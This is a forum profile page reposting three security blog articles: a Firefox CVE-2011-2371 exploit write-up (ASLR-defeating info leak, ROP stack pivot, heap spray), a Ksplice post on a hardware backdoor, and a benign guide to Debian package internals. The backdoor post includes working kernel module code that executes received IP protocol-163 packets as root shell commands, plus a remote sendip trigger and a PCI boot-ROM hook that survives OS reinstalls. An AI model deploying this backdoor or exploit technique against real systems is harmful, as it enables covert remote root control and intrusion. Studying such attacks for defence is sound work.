Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    706

Everything posted by Nytro

  1. [h=2]Exploiting CVE-2011-2371 (FF reduceRight) without non-ASLR modules[/h]22/02/2012 p_k CVE-2011-2371 (found by Chris Rohlf and Yan Ivnitskiy) is a bug in Firefox versions <= 4.0.1. It has an interesting property of being a code-exec and an info-leak bug at the same time. Unfortunately, all public exploits targeting this vulnerability rely on non-ASLR modules (like those present in Java). In this post I’ll show how to exploit this vulnerability on Firefox 4.0.1/Window 7, by leaking imagebase of one of Firefox’s modules, thus circumventing ASLR without any additional dependencies. [h=2]The bug[/h] You can see the original bug report with detailed analysis here. To make a long story short, this is the trigger: xyz = new Array; xyz.length = 0x80100000; a = function foo(prev, current, index, array) { current[0] = 0x41424344; } xyz.reduceRight(a,1,2,3); Executing it crashes Firefox: eax=0454f230 ebx=03a63da0 ecx=800fffff edx=01c6f000 esi=0012cd68 edi=0454f208 eip=004f0be1 esp=0012ccd0 ebp=0012cd1c iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 mozjs!JS_FreeArenaPool+0x15e1: 004f0be1 8b14c8 mov edx,dword ptr [eax+ecx*8] ds:0023:04d4f228=?????? eax holds a pointer to “xyz” array and ecx is equal to xyz.length-1. reduceRight visits all elements of given array in reverse order, so if the read @ 004f0be1 succeeds and we won’t crash inside the callback function (foo), JS interpreter will loop the above code with decreasing values in ecx. Value read @ 004f0be1 is passed to foo() as the “current” argument. This means we can trick the JS interpreter into passing random stuff from heap to our javascript callback. Notice we fully control the array’s length, and since ecx is multiplied by 8 (bitshifted left by 3 bits), we can access memory before of after the array, by setting/clearing the 29th bit of length. Neat . During reduceRight(), the interpreter expects jsval_layout unions: http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h 274 typedef union jsval_layout 275 { 276 uint64 asBits; 277 struct { 278 union { 279 int32 i32; 280 uint32 u32; 281 JSBool boo; 282 JSString *str; 283 JSObject *obj; 284 void *ptr; 285 JSWhyMagic why; 286 jsuword word; 287 } payload; 288 JSValueTag tag; 289 } s; 290 double asDouble; 291 void *asPtr; 292 } jsval_layout; To be more specific, we are interested in the “payload” struct. Possible values for “tag” are: http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h 92 JS_ENUM_HEADER(JSValueType, uint8) 93 { 94 JSVAL_TYPE_DOUBLE = 0x00, 95 JSVAL_TYPE_INT32 = 0x01, 96 JSVAL_TYPE_UNDEFINED = 0x02, 97 JSVAL_TYPE_BOOLEAN = 0x03, 98 JSVAL_TYPE_MAGIC = 0x04, 99 JSVAL_TYPE_STRING = 0x05, 100 JSVAL_TYPE_NULL = 0x06, 101 JSVAL_TYPE_OBJECT = 0x07, ... 119 JS_ENUM_HEADER(JSValueTag, uint32) 120 { 121 JSVAL_TAG_CLEAR = 0xFFFF0000, 122 JSVAL_TAG_INT32 = JSVAL_TAG_CLEAR | JSVAL_TYPE_INT32, 123 JSVAL_TAG_UNDEFINED = JSVAL_TAG_CLEAR | JSVAL_TYPE_UNDEFINED, 124 JSVAL_TAG_STRING = JSVAL_TAG_CLEAR | JSVAL_TYPE_STRING, 125 JSVAL_TAG_BOOLEAN = JSVAL_TAG_CLEAR | JSVAL_TYPE_BOOLEAN, 126 JSVAL_TAG_MAGIC = JSVAL_TAG_CLEAR | JSVAL_TYPE_MAGIC, 127 JSVAL_TAG_NULL = JSVAL_TAG_CLEAR | JSVAL_TYPE_NULL, 128 JSVAL_TAG_OBJECT = JSVAL_TAG_CLEAR | JSVAL_TYPE_OBJECT 129 } JS_ENUM_FOOTER(JSValueTag); Does it mean we can only read first dwords of pairs (d1,d2), where d2=JSVAL_TAG_INT32 or d2=JSVAL_TYPE_DOUBLE? Fortunately for us, no. Observe how the interpreter checks if a jsval_layout is a number: http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h 405 static JS_ALWAYS_INLINE JSBool 406 JSVAL_IS_NUMBER_IMPL(jsval_layout l) 407 { 408 JSValueTag tag = l.s.tag; 409 JS_ASSERT(tag != JSVAL_TAG_CLEAR); 410 return (uint32)tag <= (uint32)JSVAL_UPPER_INCL_TAG_OF_NUMBER_SET; So any pair of dwords (d1, d2), with d2<=JSVAL_UPPER_INCL_TAG_OF_NUMBER_SET (which is equal to JSVAL_TAG_INT32) is interpreted as a number. This isn’t the end of good news, check how doubles are recognized: http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h 369 static JS_ALWAYS_INLINE JSBool 370 JSVAL_IS_DOUBLE_IMPL(jsval_layout l) 371 { 372 return (uint32)l.s.tag <= (uint32)JSVAL_TAG_CLEAR; 373 } This means that any pair (d1,d2) with d2<=0xffff0000 is interpreted as a double-precision floating point number. It’s a clever way of saving space, since doubles with all bits of the exponent set and nonzero mantissa are NaNs anyway, so rejecting doubles greater than 0xffff 0000 0000 0000 0000 isn’t really a problem — we are just throwing out NaNs. [h=2]Leaking the image base[/h] Knowing that most of values read off the heap are interpreted as doubles in our javascript callback (function foo above), we can use a library like JSPack to decode them to byte sequences. var leak_func = function bleh(prev, current, index, array) { if(typeof current == "number"){ mem.push(current); //decode with JSPack later } count += 1; if(count>=CHUNK_SIZE/8){ throw "lol"; //stop dumping } } Notice that we are verifying the type of “current”. It’s necessary because if we encounter a jsval_value of type OBJECT, manipulating it later will cause an undesired crash. Having a chunk of memory, we still need to comb it for values revealing the image base of mozjs.dll (that’s the module implementing reduceRight). Good candidates are pointers to functions in .code section, or pointers to data structures in .data, but how to find them? After all, they change with every run, because of varying image base. By examining dumped memory manually, I noticed it’s always possible to find a pair of pointers (with fixed RVAs) to .data section, differing by a constant (0×304), so a simple algorithm is to sequentially scan pairs of dwords, check if their difference is 0×304 and use their (known) RVAs to calculate mozjs’ image base (image_base = ptr_va – ptr_rva). It’s a heuristic, but it works 100% of the time . [h=2]Taking control[/h] Assume we are able to pass a controlled jsval_layout with tag=JSVAL_TYPE_OBJECT to our JS callback. Here’s what happens after executing “current[0]=1? if the “payload.ptr” field points to an area filled with \x88: eax=00000001 ebx=00000009 ecx=40000004 edx=00000009 esi=055101b0 edi=88888888 eip=655301a9 esp=0048c2a0 ebp=13801000 iopl=0 ov up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010a06 mozjs!js::mjit::stubs::SetElem$lt;0>+0xf9: 655301a9 8b4764 mov eax,dword ptr [edi+64h] ds:002b:888888ec=???????? 0:000> k ChildEBP RetAddr 0048c308 6543fc4c mozjs!js::mjit::stubs::SetElem<0>+0xf9 [...js\src\methodjit\stubcalls.cpp @ 567] 0048c334 65445d99 mozjs!js::InvokeSessionGuard::invoke+0x13c [...\js\src\jsinterpinlines.h @ 619] 0048c418 65445fa6 mozjs!array_extra+0x3d9 [...\js\src\jsarray.cpp @ 2857] 0048c42c 65485221 mozjs!array_reduceRight+0x16 [...\js\src\jsarray.cpp @ 2932] We are using \x88 as a filler, so that every pointer taken from that area is equal to 0×88888888. Since the highest bit is set (and the pointer points to kernel space), every dereference will cause a crash and we will notice it under a debugger. Using low values, like 0x0c, as a filler during exploit development can make us miss crashes, if 0x0c0c0c0c happens to be mapped . It seems like we can control the value of edi. Let’s see if it’s of any use: 0:000> u eip l10 mozjs!js::mjit::stubs::SetElem<0>+0xf9 [...\js\src\methodjit\stubcalls.cpp @ 567]: 655301a9 8b4764 mov eax,dword ptr [edi+64h] 655301ac 85c0 test eax,eax 655301ae 7505 jne mozjs!js::mjit::stubs::SetElem<0>+0x105 (655301b5) 655301b0 b830bb4965 mov eax,offset mozjs!js_SetProperty (6549bb30) 655301b5 8b54241c mov edx,dword ptr [esp+1Ch] 655301b9 6a00 push 0 655301bb 8d4c2424 lea ecx,[esp+24h] 655301bf 51 push ecx 655301c0 53 push ebx 655301c1 55 push ebp 655301c2 52 push edx 655301c3 ffd0 call eax 655301c5 83c414 add esp,14h 655301c8 85c0 test eax,eax That’s exactly what we need — value from [edi+64h] (edi is controlled) is a function pointer called @ 655301c3. Where does edi value come from? 0:000> u eip-72 l10 mozjs!js::mjit::stubs::SetElem<0>+0x87 [...\js\src\methodjit\stubcalls.cpp @ 552]: 65530137 8b7d04 mov edi,dword ptr [ebp+4] 6553013a 81ffb05f5e65 cmp edi,offset mozjs!js_ArrayClass (655e5fb0) 65530140 8b5c2414 mov ebx,dword ptr [esp+14h] 65530144 7563 jne mozjs!js::mjit::stubs::SetElem<0>+0xf9 (655301a9) edi=[ebp+4], where ebp is equal to payload.ptr in our jsval_layout union. It’s now easy to see how to control EIP. Trigger setElem on a controlled jsval_layout union (by executing “current[0]=1? in the JS callback of reduceRight), with tag=JSVAL_TYPE_OBJECT, and ptr=PTR_TO_CONTROLLED_MEM, where [CONTROLLED_MEM+4]=NEW_EIP. Easy . Since ASLR is not an issue (we already have mozjs’ image base) we can circumvent DEP with return oriented programming. With mona.py it’s very easy to generate a ROP chain that will allocate a RWX memory chunk. From that chunk, we can run our “normal” shellcode, without worrying about DEP. !mona rop -m "mozjs" -rva “-m” restricts search to just mozjs.dll (that’s the only module with known image base) “-rva” generates a chain parametrized by module’s image base. I won’t paste the output, but mona is able to find a chain that uses VirtualAlloc to change memory permissions to RWX. There’s only one problem. In order to use that chain, we need to control the stack. During the call @ 655301c3, we don’t. Fortunately, we do control EBP, which is equal to layout.ptr field in our fake object. First idea is to use any function’s epilogue: mov esp, ebp pop ebp ret as a pivot, but notice that RET will transfer control to an address stored in [ebp+4], and since: 65530137 8b7d04 mov edi,dword ptr [ebp+4] that would mean [ebp+4] has to be a return address and a pointer to a function pointer called later @ 655301c3. We have to modify EBP before copying it to ESP. Noticing that during SetElem, property’s id is passed in EBX as 2*id+1 (when executing “current[id] = …”), it’s easy to pick a good gadget: // 0x68e7a21c, mozjs.dll // found with mona.py ADD EBP,EBX PUSH DS POP EDI POP ESI POP EBX MOV ESP,EBP //(1) POP EBP //(2) RETN This will offset EBP by a controlled ODD value. Unicode chars in JS have two byte chars, so it’s better to have EBP aligned to 2. We can realign ESP by pivoting again with new EBP value popped @ (2) and executing the same gadget from line (1). This is how our fake object has to look like: +------------+ | | 9 13 17 v------------+----------------------------------------------------------------------+ |pivot_va | ptr | 00,new_ebp,mov_esp_ebp,00 | new_ebp2 | ROP ... normal shellcode ... +-----------------------+-----------------------------------------------------------+ 0 4 8 | 18 22 | ^ | | +-------------------+ pivot_va – address of the gadget above new_ebp – value popped at (2) used to realign the stack to 2 mov_esp_ebp – address of (1) new_ebp2 – new value of EBP after executing (2) for the second time, not used ROP – generated ROP chain changing memory perms normal shellcode – message box shellcode by Skylined [h=2]Spraying[/h] Here’s a nice diagram (asciiflow FTW) describing how we are going to arrange (or attempt to arrange) things in memory: low addresses +---------------------+ +-------+ ptr | 0xffff0007 | ^ | +---------------------| | | | | | | | . | | | | . | | | | . | | | +---------------------| | half1 | +----+ ptr | 0xffff0007 | | | | +---------------------| | | | | . | | | | | . | | | | | . | | | | | | v | | +-----end of half1----+ | | | | ^ | | | | | | | | | | margin of | | | . | | error | | | . | | | | +---------------------+ v +--|---> fake object | | +--^------------------+ | | | . | | | | . | +-----+ | | | | | +---------------------+ high addresses Our spray will consist of two regions. First one will be filled with jsval_layout unions, with tag=0xffff0007 (JSVAL_TYPE_OBJECT) and ptr pointing to the second region, filled with fake objects described above. If you run the PoC exploit on Windows XP, this is how (most likely) the heap is going to look like: Zooming into of the 1MB chunks: Notice how our payload is aligned to 4KB boundary. This is because of how the spray is implemented: unicode strings are stored in an array. Beginning of the array is used to store metadata, and the actual data starts @ +4KB. It’s also useful to note that older versions of FF have a bug related to rounding allocation sizes and, in effect, allocating too much memory for objects (including strings), so instead of nicely aligned strings in array, we will get strings interleaved with chunks containing NULL bytes (I’ll explain why this isn’t a problem in a sec.). This is how the fake objects from the second part of spray look like: Four NOPs at the bottom mark the end of mona’s ROP chain. [h=2]Putting it all together[/h] Leak mozjs’ image base, as described above. Spray the heap with JS, as described above. Note where the spray starts in memory, across different OSes. Different versions of the exploit should use OS-specific constants for calculating array’s length used in reduceRight(). Calculate the length of the array (xyz in the trigger PoC) so that the first dereference should happen in the middle of first half of the spray. Aiming at the middle gives us the biggest possible margin of error — if the spray’s starting address deviates from expected value by less than size/2, it shouldn’t affect our exploit. Trigger the bug. Inside JS callback, trigger SetElem, by executing “current[4]=1?. In case of a JS exception (TypeError: current is undefined), change array’s length and continue. These exceptions are caused by NULL areas between strings. Encountering them isn’t fatal, because the JS interpreter sees them as “undefined” values and throws us a JS exception, instead of crashing . See a nice messagebox, confirming success [h=2]Limitations[/h] PoC exploit assumes (like all other public exploits for this bug) that the heap is not polluted by previous allocations. This is a bit unrealistic, because the most common “use-case” is that the victim clicks a link leading to the exploit, meaning the browser is already running and most likely has many tabs already opened. In that situation our spray probably won’t be a continuous chunk of memory, which will lead to problems (crashes). Assuming that the PoC is the first and only page opened in Firefox, probability of success (running shellcode) depends on how long we need to search for mozjs’ image base. The longer it takes, the more trash gets accumulated on the heap, resulting in more “discontinuities” in the spray region. Get the PoC here. Sursa: Exploiting CVE-2011-2371 (FF reduceRight) without non-ASLR modules | GDTR
  2. [h=3]Hosting backdoors in hardware[/h]By Ksplice Post Importer on Oct 26, 2010 Have you ever had a machine get compromised? What did you do? Did you run rootkit checkers and reboot? Did you restore from backups or wipe and reinstall the machines, to remove any potential backdoors? In some cases, that may not be enough. In this blog post, we're going to describe how we can gain full control of someone's machine by giving them a piece of hardware which they install into their computer. The backdoor won't leave any trace on the disk, so it won't be eliminated even if the operating system is reinstalled. It's important to note that our ability to do this does not depend on exploiting any bugs in the operating system or other software; our hardware-based backdoor would work even if all the software on the system worked perfectly as designed. I'll let you figure out the social engineering side of getting the hardware installed (birthday "present"?), and instead focus on some of the technical details involved. Our goal is to produce a PCI card which, when present in a machine running Linux, modifies the kernel so that we can control the machine remotely over the Internet. We're going to make the simplifying assumption that we have a virtual machine which is a replica of the actual target machine. In particular, we know the architecture and exact kernel version of the target machine. Our proof-of-concept code will be written to only work on this specific kernel version, but it's mainly just a matter of engineering effort to support a wide range of kernels. [h=3]Modifying the kernel with a kernel module[/h] The easiest way to modify the behavior of our kernel is by loading a kernel module. Let's start by writing a module that will allow us to remotely control a machine. IP packets have a field called the protocol number, which is how systems distinguish between TCP and UDP and other protocols. We're going to pick an unused protocol number, say, 163, and have our module listen for packets with that protocol number. When we receive one, we'll execute its data payload in a shell running as root. This will give us complete remote control of the machine. The Linux kernel has a global table inet_protos consisting of a struct net_protocol * for each protocol number. The important field for our purposes is handler, a pointer to a function which takes a single argument of type struct sk_buff *. Whenever the Linux kernel receives an IP packet, it looks up the entry in inet_protos corresponding to the protocol number of the packet, and if the entry is not NULL, it passes the packet to the handler function. The struct sk_buff type is quite complicated, but the only field we care about is the data field, which is a pointer to the beginning of the payload of the packet (everything after the IP header). We want to pass the payload as commands to a shell running with root privileges. We can create a user-mode process running as root using the call_usermodehelper function, so our handler looks like this: int exec_packet(struct sk_buff *skb) { char *argv[4] = {"/bin/sh", "-c", skb->data, NULL}; char *envp[1] = {NULL}; call_usermodehelper("/bin/sh", argv, envp, UMH_NO_WAIT); kfree_skb(skb); return 0; } We also have to define a struct net_protocol which points to our packet handler, and register it when our module is loaded: const struct net_protocol proto163_protocol = { .handler = exec_packet, .no_policy = 1, .netns_ok = 1 }; int init_module(void) { return (inet_add_protocol(&proto163_protocol, 163) < 0); } Let's build and load the module: rwbarton@target:~$ make make -C /lib/modules/2.6.32-24-generic/build M=/home/rwbarton modules make[1]: Entering directory `/usr/src/linux-headers-2.6.32-24-generic' CC [M] /home/rwbarton/exec163.o Building modules, stage 2. MODPOST 1 modules CC /home/rwbarton/exec163.mod.o LD [M] /home/rwbarton/exec163.ko make[1]: Leaving directory `/usr/src/linux-headers-2.6.32-24-generic' rwbarton@target:~$ sudo insmod exec163.ko Now we can use sendip (available in the sendip Ubuntu package) to construct and send a packet with protocol number 163 from a second machine (named control) to the target machine: rwbarton@control:~$ echo -ne 'touch /tmp/x\0' > payload rwbarton@control:~$ sudo sendip -p ipv4 -is 0 -ip 163 -f payload $targetip rwbarton@target:~$ ls -l /tmp/x -rw-r--r-- 1 root root 0 2010-10-12 14:53 /tmp/x Great! It worked. Note that we have to send a null-terminated string in the payload, because that's what call_usermodehelper expects to find in argv and we didn't add a terminator in exec_packet. [h=3]Modifying the on-disk kernel[/h] In the previous section we used the module loader to make our changes to the running kernel. Our next goal is to make these changes by altering the kernel on the disk. This is basically an application of ordinary binary patching techniques, so we're just going to give a high-level overview of what needs to be done. The kernel lives in the /boot directory; on my test system, it's called /boot/vmlinuz-2.6.32-24-generic. This file actually contains a compressed version of the kernel, along with the code which decompresses it and then jumps to the start. We're going to modify this code to make a few changes to the decompressed image before executing it, which have the same effect as loading our kernel module did in the previous section. When we used the kernel module loader to make our changes to the kernel, the module loader performed three important tasks for us: it allocated kernel memory to store our kernel module, including both code (the exec_packet function) and data (proto163_protocol and the string constants in exec_packet) sections; it performed relocations, so that, for example, exec_packet knows the addresses of the kernel functions it needs to call such as kfree_skb, as well as the addresses of its string constants; it ran our init_module function. We have to address each of these points in figuring out how to apply our changes without making use of the module loader. The second and third points are relatively straightforward thanks to our simplifying assumption that we know the exact kernel version on the target system. We can look up the addresses of the kernel functions our module needs to call by hand, and define them as constants in our code. We can also easily patch the kernel's startup function to install a pointer to our proto163_protocol in inet_protos[163], since we have an exact copy of its code. The first point is a little tricky. Normally, we would call kmalloc to allocate some memory to store our module's code and data, but we need to make our changes before the kernel has started running, so the memory allocator won't be initialized yet. We could try to find some code to patch that runs late enough that it is safe to call kmalloc, but we'd still have to find somewhere to store that extra code. What we're going to do is cheat and find some data which isn't used for anything terribly important, and overwrite it with our own data. In general, it's hard to be sure what a given chunk of kernel image is used for; even a large chunk of zeros might be part of an important lookup table. However, we can be rather confident that any error messages in the kernel image are not used for anything besides being displayed to the user. We just need to find an error message which is long enough to provide space for our data, and obscure enough that it's unlikely to ever be triggered. We'll need well under 180 bytes for our data, so let's look for strings in the kernel image which are at least that long: rwbarton@target:~$ strings vmlinux | egrep '^.{180}' | less One of the output lines is this one: <4>Attempt to access file with crypto metadata only in the extended attribute region, but eCryptfs was mounted without xattr support enabled. eCryptfs will not treat this like an encrypted file. This sounds pretty obscure to me, and a Google search doesn't find any occurrences of this message which aren't from the kernel source code. So, we're going to just overwrite it with our data. Having worked out what changes need to be applied to the decompressed kernel, we can modify the vmlinuz file so that it applies these changes after performing the decompression. Again, we need to find a place to store our added code, and conveniently enough, there are a bunch of strings used as error messages (in case decompression fails). We don't expect the decompression to fail, because we didn't modify the compressed image at all. So we'll overwrite those error messages with code that applies our patches to the decompressed kernel, and modify the code in vmlinuz that decompresses the kernel to jump to our code after doing so. The changes amount to 5 bytes to write that jmp instruction, and about 200 bytes for the code and data that we use to patch the decompressed kernel. [h=3]Modifying the kernel during the boot process[/h] Our end goal, however, is not to actually modify the on-disk kernel at all, but to create a piece of hardware which, if present in the target machine when it is booted, will cause our changes to be applied to the kernel. How can we accomplish that? The PCI specification defines a "expansion ROM" mechanism whereby a PCI card can include a bit of code for the BIOS to execute during the boot procedure. This is intended to give the hardware a chance to initialize itself, but we can also use it for our own purposes. To figure out what code we need to include on our expansion ROM, we need to know a little more about the boot process. When a machine boots up, the BIOS initializes the hardware, then loads the master boot record from the boot device, generally a hard drive. Disks are traditionally divided into conceptual units called sectors of 512 bytes each. The master boot record is the first sector on the drive. After loading the master boot record into memory, the BIOS jumps to the beginning of the record. On my test system, the master boot record was installed by GRUB. It contains code to load the rest of the GRUB boot loader, which in turn loads the /boot/vmlinuz-2.6.32-24-generic image from the disk and executes it. GRUB contains a built-in driver which understands the ext4 filesystem layout. However, it relies on the BIOS to actually read data from the disk, in much the same way that a user-level program relies on an operating system to access the hardware. Roughly speaking, when GRUB wants to read some sectors off the disk, it loads the start sector, number of sectors to read, and target address into registers, and then invokes the int 0x13 instruction to raise an interrupt. The CPU has a table of interrupt descriptors, which specify for each interrupt number a function pointer to call when that interrupt is raised. During initialization, the BIOS sets up these function pointers so that, for example, the entry corresponding to interrupt 0x13 points to the BIOS code handling hard drive IO. Our expansion ROM is run after the BIOS sets up these interrupt descriptors, but before the master boot record is read from the disk. So what we'll do in the expansion ROM code is overwrite the entry for interrupt 0x13. This is actually a legitimate technique which we would use if we were writing an expansion ROM for some kind of exotic hard drive controller, which a generic BIOS wouldn't know how to read, so that we could boot off of the exotic hard drive. In our case, though, what we're going to make the int 0x13 handler do is to call the original interrupt handler, then check whether the data we read matches one of the sectors of /boot/vmlinuz-2.6.32-24-generic that we need to patch. The ext4 filesystem stores files aligned on sector boundaries, so we can easily determine whether we need to patch a sector that's just been read by inspecting the first few bytes of the sector. Then we return from our custom int 0x13 handler. The code for this handler will be stored on our expansion ROM, and the entry point of our expansion ROM will set up the interrupt descriptor entry to point to it. In summary, the boot process of the system with our PCI card inserted looks like this: The BIOS starts up and performs basic initialization, including setting up the interrupt descriptor table. The BIOS runs our expansion ROM code, which hooks the int 0x13 handler so that it will apply our patch to the vmlinuz file when it is read off the disk. The BIOS loads the master boot record installed by GRUB, and jumps to it. The master boot record loads the rest of GRUB. GRUB reads the vmlinuz file from the disk, but our custom int 0x13 handler applies our patches to the kernel before returning. GRUB jumps to the vmlinuz entry point, which decompresses the kernel image. Our modifications to vmlinuz cause it to overwrite a string constant with our exec_packet function and associated data, and also to overwrite the end of the startup code to install a pointer to this data in inet_protos[163]. The startup code of the decompressed kernel runs and installs our handler in inet_protos[163]. The kernel continues to boot normally. We can now control the machine remotely over the Internet by sending it packets with protocol number 163. One neat thing about this setup is that it's not so easy to detect that anything unusual has happened. The running Linux system reads from the disk using its own drivers, not BIOS calls via the real-mode interrupt table, so inspecting the on-disk kernel image will correctly show that it is unmodified. For the same reason, if we use our remote control of the machine to install some malicious software which is then detected by the system administrator, the usual procedure of reinstalling the operating system and restoring data from backups will not remove our backdoor, since it is not stored on the disk at all. What does all this mean in practice? Just like you should not run untrusted software, you should not install hardware provided by untrusted sources. Unless you work for something like a government intelligence agency, though, you shouldn't realistically worry about installing commodity hardware from reputable vendors. After all, you're already also trusting the manufacturer of your processor, RAM, etc., as well as your operating system and compiler providers. Of course, most real-world vulnerabilities are due to mistakes and not malice. An attacker can gain control of systems by exploiting bugs in popular operating systems much more easily than by distributing malicious hardware. ~rwbarton Sursa: https://blogs.oracle.com/ksplice/entry/hosting_backdoors_in_hardware
  3. [h=3]Anatomy of a Debian package[/h][h=4]By Ksplice Post Importer on Oct 06, 2010[/h]Ever wondered what a .deb file actually is? How is it put together, and what's inside it, besides the data that is installed to your system when you install the package? Today we're going to break out our sysadmin's toolbox and find out. (While we could just turn to deb(5), that would ruin the fun.) You'll need a Debian-based system to play along. Ubuntu and other derivatives should work just fine. [h=3]Finding a file to look at[/h] Whenever APT downloads a package to install, it saves it in a package cache, located in /var/cache/apt/archives/. We can poke around in this directory to find a package to look at. spang@sencha:~> cd /var/cache/apt/archives spang@sencha:/var/cache/apt/archives> spang@sencha:/var/cache/apt/archives> ls apache2-utils_2.2.16-2_amd64.deb app-install-data_2010.08.21_all.deb apt_0.8.0_amd64.deb apt_0.8.5_amd64.deb aptitude_0.6.3-3.1_amd64.deb ... nano, the text editor, ought to be a simple package. Let's take a look at that one. spang@sencha:/var/cache/apt/archives> cp nano_2.2.5-1_amd64.deb ~/tmp/blog spang@sencha:/var/cache/apt/archives> cd ~/tmp/blogapt debian dpkg package-management [h=3]Digging in[/h] Let's see what we can figure out about this file. The file command is a nifty tool that tries to figure out what kind of data a file contains. spang@sencha:~/tmp/blog> file --raw --keep-going nano_2.2.5-1_amd64.deb nano_2.2.5-1_amd64.deb: Debian binary package (format 2.0) - current ar archive - archive file Hmm, so file, which identifies filetypes by performing tests on them (rather than by looking at the file extension or something else cosmetic), must have a special test that identifies Debian packages. Since we passed the command the --keep-going option, though, it continued on to find other tests that match against the file, which is useful because these later matches are less specific, and in our case they tell us what a "Debian binary package" actually is under the hood—an "ar" archive! [h=3]Aside: a little bit of history[/h] Back in the day, in 1995 and before, Debian packages used to use their own ad-hoc archive format. These days, you can find that old format documented in deb-old(5). The new format was added to be "saner and more extensible" than the original. You can still find binaries in the old format on archive.debian.org. You'll see that file tells us that these debs are different; it doesn't know how to identify them in a more specific way than "a bunch of bits": spang@sencha:~/tmp/blog> file --raw --keep-going adduser-1.94-1.deb adduser-1.94-1.deb: data Now we can crack open the deb using the ar utility to see what's inside. [h=3]Inside the box[/h] ar takes an operation code and modifier flags and the archive to act upon as its arguments. The x operation tells it to extract files, and the v modifier tells it to be verbose. spang@sencha:~/tmp/blog> ar vx nano_2.2.5-1_amd64.deb x - debian-binary x - control.tar.gz x - data.tar.gz So, we have three files. [h=4]debian-binary[/h] spang@sencha:~/tmp/blog> cat debian-binary 2.0 This is just the version number of the binary package format being used, so tools know what they're dealing with and can modify their behaviour accordingly. One of file's tests uses the string in this file to add the package format to its output, as we saw earlier. [h=4]control.tar.gz[/h] spang@sencha:~/tmp/blog> tar xzvf control.tar.gz ./ ./postinst ./control ./conffiles ./prerm ./postrm ./preinst ./md5sums These control files are used by the tools that work with the package and install it to the system—mostly dpkg. [h=5]control[/h] spang@sencha:~/tmp/blog> cat control Package: nano Version: 2.2.5-1 Architecture: amd64 Maintainer: Jordi Mallach Installed-Size: 1824 Depends: libc6 (>= 2.3.4), libncursesw5 (>= 5.7+20100313), dpkg (>= 1.15.4) | install-info Suggests: spell Conflicts: pico Breaks: alpine-pico (<= 2.00+dfsg-5) Replaces: pico Provides: editor Section: editors Priority: important Homepage: http://www.nano-editor.org/ Description: small, friendly text editor inspired by Pico GNU nano is an easy-to-use text editor originally designed as a replacement for Pico, the ncurses-based editor from the non-free mailer package Pine (itself now available under the Apache License as Alpine). . However, nano also implements many features missing in pico, including: - feature toggles; - interactive search and replace (with regular expression support); - go to line (and column) command; - auto-indentation and color syntax-highlighting; - filename tab-completion and support for multiple buffers; - full internationalization support. This file contains a lot of important metadata about the package. In this case, we have: its name its version number binary-specific information: which architecture it was built for, and how many bytes it takes up after it is installed its relationship to other packages (on the Depends, Suggests, Conflicts, Breaks, and Replaces lines) the person who is responsible for this package in Debian (the "maintainer") How the package is categorized in Debian as a whole: nano is in the "editors" section. A complete list of archive sections can be found here. A "priority" rating. "Important" means that the package "should be found on any Unix-like system". You'd be hard-pressed to find a Debian system without nano. a homepage a description which should provide enough information for an interested user to figure out whether or not she wants to install the package One line that takes a bit more explanation is the "Provides:" line. This means that nano, when installed, will not only count as having the nano package installed, but also as the editor package, which doesn't really exist—it is only provided by other packages. This way other packages which need a text editor can depend on "editor" and not have to worry about the fact that there are many different sufficient choices available. You can get most of this same information for installed packages and packages from your configured package repositories using the command aptitude show <packagename>, or dpkg --status <packagename> if the package is installed. [h=5]postinst, prerm, postrm, preinst[/h] These files are maintainer scripts. If you take a look at one, you'll see that it's just a shell script that is run at some point during the [un]installation process. spang@sencha:~/tmp/blog> cat preinst #!/bin/sh set -e if [ "$1" = "upgrade" ]; then if dpkg --compare-versions "$2" lt 1.2.4-2; then if [ ! -e /usr/man ]; then ln -s /usr/share/man /usr/man update-alternatives --remove editor /usr/bin/nano || RET=$? rm /usr/man if [ -n "$RET" ]; then exit $RET fi else update-alternatives --remove editor /usr/bin/nano fi fi fi More on the nitty-gritty of maintainer scripts can be found here. [h=5]conffiles[/h] spang@sencha:~/tmp/blog> cat conffiles /etc/nanorc Any configuration files for the package, generally found in /etc, are listed here, so that dpkg knows when to not blindly overwrite any local configuration changes you've made when upgrading the package. [h=5]md5sums[/h] This file contains checksums of each of the data files in the package so dpkg can make sure they weren't corrupted or tampered with. [h=4]data.tar.gz[/h] Here are the actual data files that will be added to your system's / when the package is installed. spang@sencha:~/tmp/blog> tar xzvf data.tar.gz ./ ./bin/ ./bin/nano ./usr/ ./usr/bin/ ./usr/share/ ./usr/share/doc/ ./usr/share/doc/nano/ ./usr/share/doc/nano/examples/ ./usr/share/doc/nano/examples/nanorc.sample.gz ./usr/share/doc/nano/THANKS ./usr/share/doc/nano/changelog.gz ./usr/share/doc/nano/BUGS.gz ./usr/share/doc/nano/TODO.gz ./usr/share/doc/nano/NEWS.gz ./usr/share/doc/nano/changelog.Debian.gz [...] ./etc/ ./etc/nanorc ./bin/rnano ./usr/bin/nano [h=3]Finishing up[/h] That's it! That's all there is inside a Debian package. Of course, no one building a package for Debian-based systems would do the reverse of what we just did, using raw tools like ar, tar, and gzip. Debian packages use a make-based build system, and learning how to build them using all the tools that have been developed for this purpose is a topic for another time. If you're interested, the new maintainer's guide is a decent place to start. And next time, if you need to take a look inside a .deb again, use the dpkg-deb utility: spang@sencha:~/tmp/blog> dpkg-deb --extract nano_2.2.5-1_amd64.deb datafiles spang@sencha:~/tmp/blog> dpkg-deb --control nano_2.2.5-1_amd64.deb controlfiles spang@sencha:~/tmp/blog> dpkg-deb --info nano_2.2.5-1_amd64.deb new debian package, version 2.0. size 566450 bytes: control archive= 3569 bytes. 12 bytes, 1 lines conffiles 1010 bytes, 26 lines control 5313 bytes, 80 lines md5sums 582 bytes, 19 lines * postinst #!/bin/sh 160 bytes, 5 lines * postrm #!/bin/sh 379 bytes, 20 lines * preinst #!/bin/sh 153 bytes, 10 lines * prerm #!/bin/sh Package: nano Version: 2.2.5-1 Architecture: amd64 Maintainer: Jordi Mallach Installed-Size: 1824 Depends: libc6 (>= 2.3.4), libncursesw5 (>= 5.7+20100313), dpkg (>= 1.15.4) | install-info Suggests: spell Conflicts: pico Breaks: alpine-pico (<= 2.00+dfsg-5) Replaces: pico Provides: editor Section: editors Priority: important Homepage: http://www.nano-editor.org/ Description: small, friendly text editor inspired by Pico GNU 